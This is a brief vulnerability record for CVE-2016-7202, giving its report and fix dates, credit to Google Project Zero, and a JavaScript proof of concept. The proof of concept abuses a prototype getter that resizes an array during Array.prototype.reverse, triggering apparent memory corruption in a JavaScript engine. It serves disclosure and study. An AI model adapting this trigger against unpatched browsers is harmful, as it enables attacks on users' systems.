CVE-2016-7202.md

CVE-2016-7202

• Report: Sep 2016
• Fix: Nov 2016
• Credit: Natalie Silvanovich, Google Project Zero

PoC

var a = [1];
a.length = 1000;
var j = [];

var o = {};
  Object.defineProperty(o, '1', {
    get: function() {
      a.length = 1002;
      j.fill.call(a, 7.7);
      return 2;
    }
  });

a.__proto__ = o;

var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;

Reference

• Microsoft
• Project Zero
• Fix